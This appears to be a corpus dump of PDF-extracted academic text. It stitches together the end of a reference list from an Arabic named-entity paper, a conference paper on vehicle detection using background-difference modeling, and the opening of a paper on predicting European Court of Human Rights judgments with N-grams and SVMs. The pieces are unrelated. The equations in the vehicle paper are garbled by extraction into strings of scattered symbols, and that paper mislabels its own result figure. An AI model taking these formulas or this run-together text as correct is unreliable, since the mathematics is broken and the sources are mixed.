from external semantic repositories. In Pro- ceedings of the 49th Annual Meeting of the Associa- tion for Computational Linguistics: Human Language Technologies: Short Papers - Volume 2, HLT ’11, pages 277–282, Stroudsburg, PA, USA. Association for Computational Linguistics. Joel Nothman, Nicky Ringland, Will Radford, Tara Mur- phy, and James R Curran. 2013. Learning multilin- gual Named Entity Recognition from Wikipedia. Ar- tificial Intelligence, 194:151–175. Mai Oudah and Khaled F Shaalan. 2012. A pipeline ara- bic named entity recognition using a hybrid approach. In COLING, pages 2159–2176. Marius Pasca, Dekang Lin, Jeffrey Bigham, Andrei Lif- chits, and Alpa Jain. 2006. Organizing and searching the world wide web of facts-step one: the one-million fact extraction challenge. In AAAI, volume 6, pages 1400–1405. Alexander E Richman and Patrick Schone. 2008. Mining Wiki Resources for Multilingual Named Entity Recog- nition. In ACL, pages 1–9. Ellen Riloff and Rosie Jones. 1999. Learning dictionar- ies for information extraction by multi-level bootstrap- ping. In AAAI, pages 474–479. Sriparna Saha and Asif Ekbal. 2013. Combining mul- tiple classifiers using vote based classifier ensemble technique for named entity recognition. Data & Knowledge Engineering, 85:15–39. Satoshi Sekine et al. 1998. NYU: Description of the Japanese NE system used for MET-2. In Proceed- ings of the Seventh Message Understanding Confer- ence (MUC-7), volume 17. Khaled Shaalan and Hafsa Raza. 2009. Nera: Named entity recognition for arabic. Journal of the Ameri- can Society for Information Science and Technology, 60(8):1652–1663. Edwin Simpson, Stephen Roberts, Ioannis Psorakis, and Arfon Smith. 2013. Dynamic bayesian combination of multiple imperfect classifiers. In Decision Making and Imperfection, pages 1–35. Springer. Anders Søgaard, Anders Johannsen, Barbara Plank, Dirk Hovy, and Hector Martinez. 2014. Whats in a p-value in nlp? In Proceedings of the eighteenth conference on computational natural language learning (CONLL14), pages 1–10. Sam Tardif, James R. Curran, and Tara Murphy. 2009. Improved Text Categorisation for Wikipedia Named Entities. In Proceedings of the Australasian Language Technology Association Workshop, pages 104–108. Sergey Tulyakov, Stefan Jaeger, Venu Govindaraju, and David Doermann. 2008. Review of classifier combi- nation methods. In Machine Learning in Document Analysis and Recognition, pages 361–386. Springer. Merijn Van Erp, Louis Vuurpijl, and Lambert Schomaker. 2002. An overview and comparison of voting methods for pattern recognition. In Eighth International Work- shop on Frontiers in Handwriting Recognition, pages 195–200. IEEE. Hans Van Halteren, Walter Daelemans, and Jakub Za- vrel. 2001. Improving accuracy in word class tagging through the combination of machine learning systems. Computational linguistics, 27(2):199–229. Wajdi Zaghouani. 2014. Critical Survey of the Freely Available Arabic Corpora. In Workshop on Free/Open-Source Arabic Corpora and Corpora Pro- cessing Tools, pages 1–8, Reykjavik, Iceland. Tong Zhang, Fred Damerau, and David Johnson. 2002. Text chunking based on a generalization of winnow. The Journal of Machine Learning Research, 2:615– 637. 255 256 work_2tflktf2hvbkja6rltueqe3w4q ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 6 Research on Vehicle Detection Method Based on Background Modeling Zhichao Lian School of Computer Science and Engineering Xi’an Technological University Xi’an 710032, China e-mail: 965941167@qq.com Zhongsheng Wang School of Computer Science and Engineering Xi’an Technological University Xi’an 710032, China e-mail: wangzhongsheng@xatu.edu.cn Abstract—This paper mainly studies the background difference method in the field of intelligent traffic, proposes a background modeling method base on frame difference, and compares it with the statistical average background model and Gaussian distribution background modeling method. vehicle contour obtained by the morphological method. Finally, experiments were carried out on 4 normal road traffic surveillance videos, the effective detection rate used in this paper reaches 93.75%, which has a certain degree of application. The algorithm model need to be further tested in more complex weather and different road conditions. Keywords-Vehicle Detection; Background Modeling; Inter-frame Difference; Morphological Method I. INTRODUCTION In practical applications, a vehicle detection method with fast response, high accuracy, and good adaptability becomes a key part of intelligent traffic detection management. Dealing with moving object in video is affected by many complicated conditions. Commonly used methods for detecting three kinds of moving vehicles include: difference method, optical flow method, and background difference method. Currently, the difference method includes the inter-frame difference method and the time difference method. The inter-frame difference detection method detectionspeed faster and the operation algorithm is simple, and can be detected under a scene with high real-time requirements. The time difference method is suitable for dynamically changing scenes and does not apply to completely segmenting moving objects. The optical flow method is poor in the context of real-time and practical, and it is difficult to meet the requirements for teal-time detection of moving vehicles. The background difference method has a good result on the speed and detection effect when the performance of the camera is relatively stable. The background difference method focuses on how to set up the background and dynamically update the system in real time. This article uses the background difference method. II. COMMONLY USED BACKGROUND MODELING UPDATE MODELS In the monitoring applications, the background difference method needs to establish a background reference frame. Establishing an accurate and robust background model is the key to the system, the accuracy of the frame directly affects the output. The commonly used background models are the statistical average method and the Gaussian distribution background model. A. Statistical average method background model The statistical average method, also called the mean method, is essentially a statistical filter idea. In a period of time, the collected images are added together, and the average value is taken as the reference background model. It is to obtain the gray average value ofN frames of images in the sequence image as the estimated value of the background image to weaken the interference of the moving object to the background. The specific calculation formula is shown in k 1 2 1 1 ( ... ) k k k k N Avg f f f f N           Avgk is the background model established for the acquisition of the Frame K image system; N is the average number of frames; fk,fk-1, ...,fk-N+1 are the continuous sequences frame. The statistical average method is simple and fast, but if easily causes noise accumulation and mixing. This method is more suitable for a small number of continuous motion objects in the scene, and the background is visible in the most of the time. While there are a large number of moving objects, especially when they are moving slowly, there will be a large deviation in the background of this situation. B. Gaussian Distribute Background Model The Gaussian distribution background model was first proposed by N. Friedman et.al and is divided into background models with single Gaussian distribution and mixed Gaussian distribution. The single Gaussian model method regard the change in the gray value of each pixel in the background image as a Gaussian random process, and establishes a Gaussian model for each pixel in the image, which is achieved by continuously updating the Gaussian model background image. The mixed Gaussian model uses K (basically 3~5) Gaussian models to characterize the features of each pixel in the image. After the new image is acquired, the mixed Gaussian model is updated. Each pixel in current image is mixed with a Gaussian mixture model. Matching to determine the pixel belongs to a background point or a front sight. The section focuses on the hybrid Gaussian background modeling method. This modeling method uses the statistical 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 7 information such as the probability density of a large number of sample values for a long time to represent the background. Use the statistical difference (such as 3σ principle) to judge the target pixel. This method can model complex dynamic backgrounds with a large amount of computation. Suppose that any pixel (x,y) in the background obeys a Gaussian model composed of K Gaussian distributions, as shown in follow. , , , , , , 1 ( ) ( , , ) k x y j x y x y j x y j j P I I        η(I(x, y), μ(x, y), σ(x,y,j)) means that the j-th Gaussian probability density, means value isμ(x,y,j), the variance isσ(x,y,j). And the ωjis the weight of the j-th Gaussian distribution. The pixel values observed at the current moment are compared with the current K Gaussian distribution functions in descending order of weights to obtain the best match. If there is no match, the pixel is a foreground spot.Otherwise it is a background point. The Gaussian distribution background model has a large amount of calculation, many storage parameters, and takes a long time, which is not conducive to practical application. III. IMPROVED BACKGROUND MODELING METHOD This paper proposes an adaptive background update model based on the inter-frame difference method. This method uses the background of the current frame and the background of the previous frame in the video sequence to perform weighted averaging to update the background. The specific methods are as shown in formulas (3) and (4) as shown. ( , , ) | ( , , ) ( , , ) |Diff x y t I x y t B x y t   1 ( , , ) ( , , ) 0 h Diff x y t T BOM x y t otherwise      I(x, y, t) and B(x, y, t) are the current frame containing the moving object at t time and the updated current background image; Th is the threshold and the maximum peak right fade in the difference image histogram is used,and the gray level corresponding to 1/10 of the maximum peak. Using equation (5) to obtain the motion template Stencil(x, y, t) at time t from two adjacent spaced images, it is used as a target factor to determine which pixels in the current frame are used to update the current background. Use the formula (6) to obtain the instantaneous background and update the background using the weighted average of the instantaneous background and the current background, as shown in Equation (7). ( , , ) ( , , ) & ( , , 1)Stencil x y t BOM x y t BOM x y t   ( , , 1) ( , , ) 0 ( , , ) ( , , ) ( , , ) 1 temp B x y t Stencil x y t B x y t I x y t Stencil x y t       ( , , ) α ( , , ) (1 α) ( , , 1) temp B x y t B x y t B x y t     Among them, in order to update the coefficient, theαvalue has a positive correlation with the update speed. The larger theαvalue is, the faster the update speed is, and the change of the external light can be captured in time so that the current background is closer to the external condition of the current frame. The smaller the value is, the slower the update rate will be, and the current background acquired will have some deviation. After the background image is extracted, the current motion area is segmented using the background difference method. Using the threshold parameter in the expression (8), the image is binaries and segmented to obtain the foreground binary image. 1 ( , , ) ( , , ) 0 Diff x y t threshold D x y t other      Threshold in the formula should be properly selected, through the experimental results to filter the residual background. IV. EXPERIMENTAL TESTING According to the flow of the vehicle detection algorithm, the original video frame→background update and extraction algorithm→motion region segmentation→frame image conversion to grayscale image→binary processing→morphological processing→obtain the detection result, and complete detection test. A. Comparison of experimental results By using the statistical average method, the background of the mixture Gaussian model and the method proposed in this paper, the background model is obtained by modeling the background image of a video of a traffic video surveillance video. The video of this video screen is 1080 * 960, the frequency is 25fps, and the time length is 10 seconds.The experimental results are shown are shown in Fig.1 below. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 8 (a)Original image frame The resulting background frame image (b-1)Statistical average method (c-1)Mixed Gaussian method (d-1)This article's algorithm Background and frame image difference processing (b-2)Statistical average method (c-2)Mixed Gaussian method (d-2)This article's algorithm Binary operation (b-3)Statistical average method (c-3)Mixed Gaussian method (d-3)This article's algorithm Open operation (b-4)Statistical average method (c-4)Mixed Gaussian method (d-4)This article's algorithm Close operation (b-5)Statistical average method (c-5)Mixed Gaussian method (d-5)This article's algorithm Figure 1. Comparison of experimental results with three methods 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 9 It can be seen that in the background frame extraction process, the average statistical method extracts the background [Fig. 1 (b-1)] and the blurred background is affected by the camera shake of the video camera, and the effect is worst. The parameters of the mixed Gaussian model are set as follows: the number of pixel models is 5, the initial variance is 30, and the learning rate of model weights is α = 0.005, T = 0.7; The resulting background [Fig. 1 (c-1)] is clearer, but the background extracted at the lower left corner of the screen is still somewhat blurred; the corresponding parameter setting of this algorithm is: Th = 15, α = 0.2, threshold = 12. The background [Fig. 1 (d-1)] obtained by the method proposed in this paper is of good quality and closer to the real background. Finally, after the difference, binary processing, and morphological processing, the image is finally obtained. The statistical mean method [Fig. 1 (b-5)] is noisy, and the extraction result is not clear. The result graph obtained by using the Gaussian method [Fig. 1(c-5)] works well, but there is still noise. The result graph obtained by using this algorithm [Fig. 1(c-5)] has the best effect, the noise is very small, the extracted vehicle is clearer and the connectivity is better. B. Comparison of Algorithm Performance The final conclusion of the comparison experiment is not only drawn from the experimental results, but also from the performance side. Table 1 compares the performance ofthe three methods, including the time used for the entire inspection process, the memory footprint, and the CPU usage. It can be seen that the algorithm proposed in this paper compared with the other two methods, it consumes less time, consumes less memory, and has a small CPU occupancy rate. TABLEI Comparison of performance of three modeling methods Background model Time-consuming (seconds) Average memory size (MB) Average CPU usage Statistical average 149 169 65% Gaussian distribution 40 99 35% Method of this article 25 60 32% V. CONCLUSION This dissertation focuses on the vehicle detection method based on background difference in the intelligent traffic field, and proposes a background modeling method based on the adaptive difference method between frames. Design experiments were compared with commonly used averaging methods and Gaussian distribution model methodsto compare the background images obtained by the three modeling methods. At the same time, the running performance of the algorithm is analyzed from the aspects of time-consuming, memory occupancy and CPU occupancy, which verifies that the vehicle detection algorithm proposed in this paper can extract the background more accurately. The morphological method is used to process the differential binary image to eliminate noise, fill in voids, etc. to complete the detection step. Experiments prove the effectiveness and real-time performance of the algorithm for video-based motion vehicle detection. However, the effect of this algorithm in complex weather conditions and complex road conditions needs to be further improved. REFERENCES [1] Ma Junqiang. Research on the detection and tracking technology of sports vehicles based on video [D]. Beijing University of Technology, 2009. [2] Yu jie, Li Xiaojing. Moving object detection based on mean background and three framedifference[J]. Journal of Shaanxi University of Science and Technology, 2018(1). [3] Zhou Mingjiang, Wang Jiwu. Research on the Detection and Tracking Method of Moving Vehicles in Video Sequences[J]. Science and Technology Economic Market, 2017(4):76-78. [4] Fan Wenjie, Zhang Li. An Improved Method of Moving Vehicle Detection Based on Background Difference Algorithm [J]. Journal of Chengdu University of Information Technology, 2010, 25(4):355-360. [5] Huang Lei, Yu Manman. Research on Moving Object Detection Based on Background Difference [J]. Software Herald, 2009(6):187-188. [6] Lu Xixin. Detection of moving objects based on Gaussian mixture model and three-frame difference method[D]. Xi'an University of Technology, 2011. [7] Federal Highway Administration, Department of Transportation, Highway Performance Monitoring System Reassessment, Final Report, FHWA-PL-99-001, 1999: 32-34 [8] Jean Serra.Introduction to mathematical morphology.Computer Vision, Graphicsand Image Processing, 2005,35(7):283-305 [9] YananakaK.Effects of misdate Smith Predictor on stability in System with Time-delay.Automatically, 2011,23(7):787-791. [10] Cheung S, Kamath C. Robust background subtraction with foreground validation for urban traffic video[J]. EURASIP Journal on Applied Signal Processing, 2005,14: 2330- 2340. work_2timpskoaza73ntj374tkxmaty ---- Predicting judicial decisions of the European Court of Human Rights: a Natural Language Processing perspective This is a repository copy of Predicting judicial decisions of the European Court of Human Rights: a Natural Language Processing perspective. White Rose Research Online URL for this paper: http://eprints.whiterose.ac.uk/144020/ Version: Published Version Article: Tsarapatsanis, Dimitrios orcid.org/0000-0002-6419-4321, Aletras, Nikolaos, Preotiuc- Pietro, Daniel et al. (1 more author) (2016) Predicting judicial decisions of the European Court of Human Rights: a Natural Language Processing perspective. PeerJ Computer Science. ISSN 2376-5992 https://doi.org/10.7717/peerj-cs.93 eprints@whiterose.ac.uk https://eprints.whiterose.ac.uk/ Reuse This article is distributed under the terms of the Creative Commons Attribution (CC BY) licence. This licence allows you to distribute, remix, tweak, and build upon the work, even commercially, as long as you credit the authors for the original work. More information and the full terms of the licence here: https://creativecommons.org/licenses/ Takedown If you consider content in White Rose Research Online to be in breach of UK law, please notify us by emailing eprints@whiterose.ac.uk including the URL of the record and the reason for the withdrawal request. Submitted 11 May 2016 Accepted 23 September 2016 Published 24 October 2016 Corresponding author Nikolaos Aletras, nikos.aletras@gmail.com Academic editor Lexing Xie Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.93 Copyright 2016 Aletras etal Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Predicting judicial decisions of the European Court of Human Rights: a Natural Language Processing perspective Nikolaos Aletras1,2, Dimitrios Tsarapatsanis3, Daniel Preoţiuc-Pietro4,5 and Vasileios Lampos2 1 Amazon.com, Cambridge, United Kingdom 2 Department of Computer Science, University College London, University of London, London, United Kingdom 3 School of Law, University of Sheffield, Sheffield, United Kingdom 4 Positive Psychology Center, University of Pennsylvania, Philadelphia, United States 5 Computer & Information Science, University of Pennsylvania, Philadelphia, United States ABSTRACT Recent advances in Natural Language Processing and Machine Learning provide us with the tools to build predictive models that can be used to unveil patterns driving judicial decisions. This can be useful, for both lawyers and judges, as an assisting tool to rapidly identify cases and extract patterns which lead to certain decisions. This paper presents the first systematic study on predicting the outcome of cases tried by the European Court of Human Rights based solely on textual content. We formulate a binary classification task where the input of our classifiers is the textual content extracted from a case and the target output is the actual judgment as to whether there has been a violation of an article of the convention of human rights. Textual information is represented using contiguous word sequences, i.e., N-grams, and topics. Our models can predict the court’s decisions with a strong accuracy (79% on average). Our empirical analysis indicates that the formal facts of a case are the most important predictive factor. This is consistent with the theory of legal realism suggesting that judicial decision-making is significantly affected by the stimulus of the facts. We also observe that the topical content of a case is another important feature in this classification task and explore this relationship further by conducting a qualitative analysis. Subjects Artificial Intelligence, Computational Linguistics, Data Mining and Machine Learning, Data Science, Natural Language and Speech Keywords Natural Language Processing, Text Mining, Legal Science, Machine Learning, Artificial Intelligence, Judicial decisions INTRODUCTION In his prescient work on investigating the potential use of information technology in the legal domain, Lawlor surmised that computers would one day become able to analyse and predict the outcomes of judicial decisions (Lawlor, 1963). According to Lawlor, reliable prediction of the activity of judges would depend on a scientific understanding of the ways that the law and the facts impact on the relevant decision-makers, i.e., the judges. More than fifty years later, the advances in Natural Language Processing (NLP) and Machine Learning (ML) provide us with the tools to automatically analyse legal materials, so as to build successful predictive models of judicial outcomes. How to cite this article Aletras etal (2016), Predicting judicial decisions of the European Court of Human Rights: a Natural Language Processing perspective. PeerJ Comput. Sci. 2:e93; DOI 10.7717/peerj-cs.93 1An amicus curiae (friend of the court) is a person or organisation that offers testimony before the Court in the context of a particular case without being a formal party to the proceedings. In this paper, our particular focus is on the automatic analysis of cases of the European Court of Human Rights (ECtHR or Court). The ECtHR is an international court that rules on individual or, much more rarely, State applications alleging violations by some State Party of the civil and political rights set out in the European Convention on Human Rights (ECHR or Convention). Our task is to predict whether a particular Article of the Convention has been violated, given textual evidence extracted from a case, which comprises of specific parts pertaining to the facts, the relevant applicable law and the arguments presented by the parties involved. Our main hypotheses are that (1) the textual content, and (2) the different parts of a case are important factors that influence the outcome reached by the Court. These hypotheses are corroborated by the results. Our work lends some initial plausibility to a text-based approach with regard to ex ante prediction of ECtHR outcomes on the assumption that the text extracted from published judgments of the Court bears a sufficient number of similarities with, and can therefore stand as a (crude) proxy for, applications lodged with the Court as well as for briefs submitted by parties in pending cases. We submit, though, that full acceptance of that reasonable assumption necessitates more empirical corroboration. Be that as it may, our more general aim is to work under this assumption, thus placing our work within the larger context of ongoing empirical research in the theory of adjudication about the determinants of judicial decision-making. Accordingly, in the discussion we highlight ways in which automatically predicting the outcomes of ECtHR cases could potentially provide insights on whether judges follow a so-called legal model (Grey, 1983) of decision making or their behavior conforms to the legal realists’ theorization (Leiter, 2007), according to which judges primarily decide cases by responding to the stimulus of the facts of the case. We define the problem of the ECtHR case prediction as a binary classification task. We utilise textual features, i.e., N-grams and topics, to train Support Vector Machine (SVM) classifiers (Vapnik, 1998). We apply a linear kernel function that facilitates the interpretation of models in a straightforward manner. Our models can reliably predict ECtHR decisions with high accuracy, i.e., 79% on average. Results indicate that the ‘facts’ section of a case best predicts the actual court’s decision, which is more consistent with legal realists’ insights about judicial decision-making. We also observe that the topical content of a case is an important indicator whether there is a violation of a given Article of the Convention or not. Previous work on predicting judicial decisions, representing disciplinary backgrounds in political science and economics, has largely focused on the analysis and prediction of judges’ votes given non textual information, such as the nature and the gravity of the crime or the preferred policy position of each judge (Kort, 1957; Nagel, 1963; Keown, 1980; Segal, 1984; Popple, 1996; Lauderdale & Clark, 2012). More recent research shows that information from texts authored by amici curiae1 improves models for predicting the votes of the US Supreme Court judges (Sim, Routledge & Smith, 2015). Also, a text mining approach utilises sources of metadata about judge’s votes to estimate the degree to which those votes are about common issues (Lauderdale & Clark, 2014). Accordingly, this paper presents the first systematic study on predicting the decision outcome of cases tried at a major international court by mining the available textual information. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 2/19 2ECHtR provisional annual report for the year 2015: http://www.echr.coe.int/ Documents/Annual_report_2015_ENG. pdf. 3HUDOC ECHR Database: http://hudoc. echr.coe.int/. 4Nonetheless, not all cases that pass this first admissibility stage are decided in the same way. While the individual judge’s decision on admissibility is final and does not comprise the obligation to provide reasons, a Committee deciding a case may, by unanimous vote, declare the application admissible and render a judgment on its merits, if the legal issue raised by the application is covered by well-established case-law by the Court. Overall, we believe that building a text-based predictive system of judicial decisions can offer lawyers and judges a useful assisting tool. The system may be used to rapidly identify cases and extract patterns that correlate with certain outcomes. It can also be used to develop prior indicators for diagnosing potential violations of specific Articles in lodged applications and eventually prioritise the decision process on cases where violation seems very likely. This may improve the significant delay imposed by the Court and encourage more applications by individuals who may have been discouraged by the expected time delays. MATERIALS AND METHODS European Court of Human Rights The ECtHR is an international court set up in 1959 by the ECHR. The court has jurisdiction to rule on the applications of individuals or sovereign states alleging violations of the civil and political rights set out in the Convention. The ECHR is an international treaty for the protection of civil and political liberties in European democracies committed to the rule of law. The treaty was initially drafted in 1950 by the ten states which had created the Council of Europe in the previous year. Membership in the Council entails becoming party to the Convention and all new members are expected to ratify the ECHR at the earliest opportunity. The Convention itself entered into force in 1953. Since 1949, the Council of Europe and thus the Convention have expanded significantly to embrace forty-seven states in total, with a combined population of nearly 800 million. Since 1998, the Court has sat as a full-time court and individuals can apply to it directly, if they can argue that they have voiced their human rights grievance by exhausting all effective remedies available to them in their domestic legal systems before national courts. Case processing by the court The vast majority of applications lodged with the Court are made by individuals. Applications are first assessed at a prejudicial stage on the basis of a list of admissibility criteria. The criteria pertain to a number of procedural rules, chief amongst which is the one on the exhaustion of effective domestic remedies. If the case passes this first stage, it can either be allocated to a single judge, who may declare the application inadmissible and strike it out of the Court’s list of cases, or be allocated to a Committee or a Chamber. A large number of the applications, according to the court’s statistics fail this first admissibility stage. Thus, to take a representative example, according to the Court’s provisional annual report for the year 2015,2 900 applications were declared inadmissible or struck out of the list by Chambers, approximately 4,100 by Committees and some 78,700 by single judges. To these correspond, for the same year, 891 judgments on the merits. Moreover, cases held inadmissible or struck out are not reported, which entails that a text-based predictive analysis of them is impossible. It is important to keep this point in mind, since our analysis was solely performed on cases retrievable through the electronic database of the court, HUDOC.3 The cases analysed are thus the ones that have already passed the first admissibility stage,4 with the consequence that the Court decided on these cases’ merits under one of its formations. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 3/19 5Rules of ECtHR, http://www.echr.coe.int/ Documents/Rules_Court_ENG.pdf. Main premise Our main premise is that published judgments can be used to test the possibility of a text-based analysis for ex ante predictions of outcomes on the assumption that there is enough similarity between (at least) certain chunks of the text of published judgments and applications lodged with the Court and/or briefs submitted by parties with respect to pending cases. Predictive tasks were based on the text of published judgments rather than lodged applications or briefs simply because we did not have access to the relevant data set. We thus used published judgments as proxies for the material to which we do not have access. This point should be borne in mind when approaching our results. At the very least, our work can be read in the following hypothetical way: if there is enough similarity between the chunks of text of published judgments that we analyzed and that of lodged applications and briefs, then our approach can be fruitfully used to predict outcomes with these other kinds of texts. Case structure The judgments of the Court have a distinctive structure, which makes them particularly suitable for a text-based analysis. According to Rule 74 of the Rules of the Court,5 a judgment contains (among other things) an account of the procedure followed on the national level, the facts of the case, a summary of the submissions of the parties, which comprise their main legal arguments, the reasons in point of law articulated by the Court and the operative provisions. Judgments are clearly divided into different sections covering these contents, which allows straightforward standardisation of the text and consequently renders possible text-based analysis. More specifically, the sections analysed in this paper are the following: • Procedure: This section contains the procedure followed before the Court, from the lodging of the individual application until the judgment was handed down. • The facts: This section comprises all material which is not considered as belonging to points of law, i.e., legal arguments. It is important to stress that the facts in the above sense do not just refer to actions and events that happened in the past as these have been formulated by the Court, giving rise to an alleged violation of a Convention article. The ‘Facts’ section is divided in the following subsections: – The circumstances of the case: This subsection has to do with the factual background of the case and the procedure (typically) followed before domestic courts before the application was lodged by the Court. This is the part that contains materials relevant to the individual applicant’s story in its dealings with the respondent state’s authorities. It comprises a recounting of all actions and events that have allegedly given rise to a violation of the ECHR. With respect to this subsection, a number of crucial clarifications and caveats should be stressed. To begin with, the text of the ‘Circumstances’ subsection has been formulated by the Court itself. As a result, it should not always be understood as a neutral mirroring of the factual background of the case. The choices made by the Court when it comes to formulations of the facts incorporate implicit or explicit judgments to the effect that some facts are more Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 4/19 relevant than others. This leaves open the possibility that the formulations used by the Court may be tailor-made to fit a specific preferred outcome. We openly acknowledge this possibility, but we believe that there are several ways in which it is mitigated. First, the ECtHR has limited fact-finding powers and, in the vast majority of cases, it defers, when summarizing the factual background of a case, to the judgments of domestic courts that have already heard and dismissed the applicants’ ECHR-related complaint (Leach, Paraskeva & Uelac, 2010; Leach, 2013). While domestic courts do not necessarily hear complaints on the same legal issues as the ECtHR does, by virtue of the incorporation of the Convention by all States Parties (Helfer, 2008), they typically have powers to issue judgments on ECHR-related issues. Domestic judgments may also reflect assumptions about the relevance of various events, but they also provide formulations of the facts that have been validated by more than one decision-maker. Second, the Court cannot openly acknowledge any kind of bias on its part. This means that, on their face, summaries of facts found in the ‘Circumstances’ section have to be at least framed in as neutral and impartial a way as possible. As a result, for example, clear displays of impartiality, such as failing to mention certain crucial events, seem rather improbable. Third, a cursory examination of many ECtHR cases indicates that, in the vast majority of cases, parties do not seem to dispute the facts themselves, as contained in the ‘Circumstances’ subsection, but only their legal significance (i.e., whether a violation took place or not, given those facts). As a result, the ‘Circumstances’ subsection contains formulations on which, in the vast majority of cases, disputing parties agree. Last, we hasten to add that the above three kinds of considerations do not logically entail that other forms of non-outright or indirect bias in the formulation of facts are impossible. However, they suggest that, in the absence of access to other kinds of textual data, such as lodged applications and briefs, the ‘Circumstances’ subsection can reasonably perform the function of a (sometimes crude) proxy for a textual representation of the factual background of a case. – Relevant law: This subsection of the judgment contains all legal provisions other than the articles of the Convention that can be relevant to deciding the case. These are mostly provisions of domestic law, but the Court also frequently invokes other pertinent international or European treaties and materials. • The law: The law section considers the merits of the case, through the use of legal argument. Depending on the number of issues raised by each application, the section is further divided into subsections that examine individually each alleged violation of some Convention article (see below). However, the Court in most cases refrains from examining all such alleged violations in detail. Insofar as the same claims can be made by invoking more than one article of the Convention, the Court frequently decides only those that are central to the arguments made. Moreover, the Court frequently refrains from deciding on an alleged violation of an article, if it overlaps sufficiently with some other violation it has already decided on. – Alleged violation of article x: Each subsection of the judgment examining alleged violations in depth is divided into two sub-sections. The first one contains the Parties’ Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 5/19 6The data set is publicly available for download from https://figshare.com/s/ 6f7d9e7c375ff0822564. Figure 1 Procedure. This section contains the procedure followed before the Court, from the lodging of the individual application until the judgment was handed down. Submissions. The second one comprises the arguments made by the Court itself on the Merits. ∗ Parties’ submissions: The Parties’ Submissions typically summarise the main arguments made by the applicant and the respondent state. Since in the vast majority of cases the material facts are taken for granted, having been authoritatively established by domestic courts, this part has almost exclusively to do with the legal arguments used by the parties. ∗ Merits: This subsection provides the legal reasons that purport to justify the specific outcome reached by the Court. Typically, the Court places its reasoning within a wider set of rules, principles and doctrines that have already been established in its past case-law and attempts to ground the decision by reference to these. It is to be expected, then, that this subsection refers almost exclusively to legal arguments, sometimes mingled with bits of factual information repeated from previous parts. • Operative provisions: This is the section where the Court announces the outcome of the case, which is a decision to the effect that a violation of some Convention article either did or did not take place. Sometimes it is coupled with a decision on the division of legal costs and, much more rarely, with an indication of interim measures, under article 39 of the ECHR. Figures 1–4, show extracts of different sections from the Case of ‘‘Velcheva v. Bulgaria’’ (http://hudoc.echr.coe.int/sites/eng/pages/search.aspx?i=001-155099) following the structure described above. Data We create a data set6 consisting of cases related to Articles 3, 6, and 8 of the Convention. We focus on these three articles for two main reasons. First, these articles provided the most data we could automatically scrape. Second, it is of crucial importance that there should be a sufficient number of cases available, in order to test the models. Cases from the selected articles fulfilled both criteria. Table 1 shows the Convention right that each article protects and the number of cases in our data set. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 6/19 Figure 2 The facts. This section comprises all material which is not considered as belonging to points of law, i.e., legal arguments. Figure 3 The law. The law section is focused on considering the merits of the case, through the use of le- gal argument. Figure 4 Operative provisions. This is the section where the Court announces the outcome of the case, which is a decision to the effect that a violation of some Convention article either did or did not take place. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 7/19 Table 1 Articles of the Convention and number of cases in the data set. Article numbers, Convention right that each article protects and the number of cases in our data set. Article Human Right Cases 3 Prohibits torture and inhuman and degrading treatment 250 6 Protects the right to a fair trial 80 8 Provides a right to respect for one’s ‘‘private and family life, his home and his correspondence’’ 254 For each article, we first retrieve all the cases available in HUDOC. Then, we keep only those that are in English and parse them following the case structure presented above. We then select an equal number of violation and non-violation cases for each particular article of the Convention. To achieve a balanced number of violation/non-violation cases, we first count the number of cases available in each class. Then, we choose all the cases in the smaller class and randomly select an equal number of cases from the larger class. This results to a total of 250, 80 and 254 cases for Articles 3, 6 and 8, respectively. Finally, we extract the text under each part of the case by using regular expressions, making sure that any sections on operative provisions of the Court are excluded. In this way, we ensure that the models do not use information pertaining to the outcome of the case. We also preprocess the text by lower-casing and removing stop words (i.e., frequent words that do not carry significant semantic information) using the list provided by NLTK (https://raw.githubusercontent.com/nltk/nltk_data/ghpages/packages/corpora/ stopwords.zip). Description of textual features We derive textual features from the text extracted from each section (or subsection) of each case. These are either N-gram features, i.e., contiguous word sequences, or word clusters, i.e., abstract semantic topics. • N-gram features: The Bag-of-Words (BOW) model (Salton, Wong & Yang, 1975; Salton & McGill, 1986) is a popular semantic representation of text used in NLP and Information Retrieval. In a BOW model, a document (or any text) is represented as the bag (multiset) of its words (unigrams) or N-grams without taking into account grammar, syntax and word order. That results to a vector space representation where documents are represented as m-dimensional variables over a set of m N-grams. N-gram features have been shown to be effective in various supervised learning tasks (Bamman, Eisenstein & Schnoebelen, 2014; Lampos & Cristianini, 2012). For each set of cases in our data set, we compute the top-2000 most frequent N-grams where N ∈ {1,2,3,4}. Each feature represents the normalized frequency of a particular N-gram in a case or a section of a case. This can be considered as a feature matrix, C ∈ Rc×m, where c is the number of the cases and m = 2,000. We extract N-gram features for the Procedure (Procedure), Circumstances (Circumstances), Facts (Facts), Relevant Law (Relevant Law), Law (Law) and the Full case (Full) respectively. Note that the representations of the Facts is obtained by taking the mean vector of Circumstances and Relevant Law. In a similar Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 8/19 way, the representation of the Full case is computed by taking the mean vector of all of its sub-parts. • Topics: We create topics for each article by clustering together N-grams that are semantically similar by leveraging the distributional hypothesis suggesting that similar words appear in similar contexts. We thus use the C feature matrix (see above), which is a distributional representation (Turney & Pantel, 2010) of the N-grams given the case as the context; each column vector of the matrix represents an N-gram. Using this vector representation of words, we compute N-gram similarity using the cosine metric and create an N-gram by N-gram similarity matrix. We finally apply spectral clustering (von Luxburg, 2007)—which performs graph partitioning on the similarity matrix—to obtain 30 clusters of N-grams. For Articles 6 and 8, we use the Article 3 data for selecting the number of clusters T , where T = {10,20,...,100}, while for Article 3 we use Article 8. Given that the obtained topics are hard clusters, an N-gram can only be part of a single topic. A representation of a cluster is derived by looking at the most frequent N-grams it contains. The main advantages of using topics (sets of N-grams) instead of single N-grams is that it reduces the dimensionality of the feature space, which is essential for feature selection, it limits overfitting to training data (Lampos et al., 2014; Preoţiuc-Pietro, Lampos & 